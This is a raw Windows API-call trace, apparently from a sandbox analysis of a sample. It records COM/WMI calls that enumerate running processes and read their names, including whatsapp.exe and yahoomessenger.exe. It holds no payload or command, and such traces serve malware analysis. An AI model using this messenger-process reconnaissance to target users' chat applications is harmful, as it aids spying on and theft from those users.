WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631ea8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630d98) returned 0x0 [0214.482] WbemDefPath:IUnknown:Release (This=0x5631ea8) returned 0x0 [0214.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630d98, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630d98) returned 0x0 [0214.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630d98, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.483] WbemDefPath:IUnknown:AddRef (This=0x5630d98) returned 0x3 [0214.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630d98, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630d98, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630d98, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631eb8) returned 0x0 [0214.483] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631eb8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.483] WbemDefPath:IUnknown:Release (This=0x5631eb8) returned 0x3 [0214.483] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.483] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630d98, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.483] WbemDefPath:IUnknown:Release (This=0x5630d98) returned 0x2 [0214.483] WbemDefPath:IUnknown:Release (This=0x5630d98) returned 0x1 [0214.483] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.483] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630d98, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630d98) returned 0x0 [0214.483] WbemDefPath:IUnknown:AddRef (This=0x5630d98) returned 0x3 [0214.484] WbemDefPath:IUnknown:Release (This=0x5630d98) returned 0x2 [0214.484] WbemDefPath:IWbemPath:SetText (This=0x5630d98, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"") returned 0x0 [0214.484] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.484] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.484] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.484] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.484] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.484] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.484] IWbemClassObject:Get (in: This=0x562eb90, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26921a0*=0, plFlavor=0x26921a4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x26921a0*=8, plFlavor=0x26921a4*=0) returned 0x0 [0214.484] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0214.484] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0214.484] IWbemClassObject:Get (in: This=0x562eb90, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26921a0*=8, plFlavor=0x26921a4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x26921a0*=8, plFlavor=0x26921a4*=0) returned 0x0 [0214.484] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0214.484] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0214.484] CoTaskMemAlloc (cb=0x4) returned 0x5631ee8 [0214.484] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631ee8, puReturned=0x267acc0 | out: apObjects=0x5631ee8*=0x562ed28, puReturned=0x267acc0*=0x1) returned 0x0 [0214.485] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562ed28) returned 0x0 [0214.485] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.485] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.486] IUnknown:AddRef (This=0x562ed28) returned 0x3 [0214.486] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.486] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.486] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562ed2c) returned 0x0 [0214.486] IMarshal:GetUnmarshalClass (in: This=0x562ed2c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.486] IUnknown:Release (This=0x562ed2c) returned 0x3 [0214.486] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.486] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.486] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.486] IUnknown:Release (This=0x562ed28) returned 0x2 [0214.486] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.486] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.486] IUnknown:QueryInterface (in: This=0x562ed28, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562ed28) returned 0x0 [0214.486] IUnknown:AddRef (This=0x562ed28) returned 0x4 [0214.486] IUnknown:Release (This=0x562ed28) returned 0x3 [0214.486] IUnknown:Release (This=0x562ed28) returned 0x2 [0214.486] CoTaskMemFree (pv=0x5631ee8) [0214.486] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.486] IUnknown:AddRef (This=0x562ed28) returned 0x3 [0214.486] IWbemClassObject:Get (in: This=0x562ed28, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.487] IWbemClassObject:Get (in: This=0x562ed28, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.487] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"") returned 0x66 [0214.487] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"") returned 0x66 [0214.487] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.487] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.487] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.487] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.488] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631ee8) returned 0x0 [0214.488] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631ee8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.488] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631ee8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630e78) returned 0x0 [0214.488] WbemDefPath:IUnknown:Release (This=0x5631ee8) returned 0x0 [0214.488] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630e78, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630e78) returned 0x0 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630e78, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.489] WbemDefPath:IUnknown:AddRef (This=0x5630e78) returned 0x3 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630e78, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630e78, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630e78, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631ef8) returned 0x0 [0214.489] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631ef8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.489] WbemDefPath:IUnknown:Release (This=0x5631ef8) returned 0x3 [0214.489] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.489] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630e78, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.489] WbemDefPath:IUnknown:Release (This=0x5630e78) returned 0x2 [0214.489] WbemDefPath:IUnknown:Release (This=0x5630e78) returned 0x1 [0214.489] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.489] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630e78, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630e78) returned 0x0 [0214.489] WbemDefPath:IUnknown:AddRef (This=0x5630e78) returned 0x3 [0214.489] WbemDefPath:IUnknown:Release (This=0x5630e78) returned 0x2 [0214.489] WbemDefPath:IWbemPath:SetText (This=0x5630e78, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"") returned 0x0 [0214.489] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.489] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.490] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.490] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.490] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.490] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.490] IWbemClassObject:Get (in: This=0x562ed28, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2692a20*=0, plFlavor=0x2692a24*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x2692a20*=8, plFlavor=0x2692a24*=0) returned 0x0 [0214.490] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0214.490] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0214.490] IWbemClassObject:Get (in: This=0x562ed28, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2692a20*=8, plFlavor=0x2692a24*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x2692a20*=8, plFlavor=0x2692a24*=0) returned 0x0 [0214.490] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0214.490] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0214.490] CoTaskMemAlloc (cb=0x4) returned 0x5631f28 [0214.490] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631f28, puReturned=0x267acc0 | out: apObjects=0x5631f28*=0x562eec0, puReturned=0x267acc0*=0x1) returned 0x0 [0214.491] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562eec0) returned 0x0 [0214.491] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.491] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.491] IUnknown:AddRef (This=0x562eec0) returned 0x3 [0214.491] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.491] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.491] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562eec4) returned 0x0 [0214.491] IMarshal:GetUnmarshalClass (in: This=0x562eec4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.491] IUnknown:Release (This=0x562eec4) returned 0x3 [0214.492] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.492] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.492] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.492] IUnknown:Release (This=0x562eec0) returned 0x2 [0214.492] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.492] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.492] IUnknown:QueryInterface (in: This=0x562eec0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562eec0) returned 0x0 [0214.492] IUnknown:AddRef (This=0x562eec0) returned 0x4 [0214.492] IUnknown:Release (This=0x562eec0) returned 0x3 [0214.492] IUnknown:Release (This=0x562eec0) returned 0x2 [0214.492] CoTaskMemFree (pv=0x5631f28) [0214.492] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.492] IUnknown:AddRef (This=0x562eec0) returned 0x3 [0214.492] IWbemClassObject:Get (in: This=0x562eec0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.493] IWbemClassObject:Get (in: This=0x562eec0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.493] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"") returned 0x66 [0214.493] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"") returned 0x66 [0214.493] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.493] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.493] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.493] 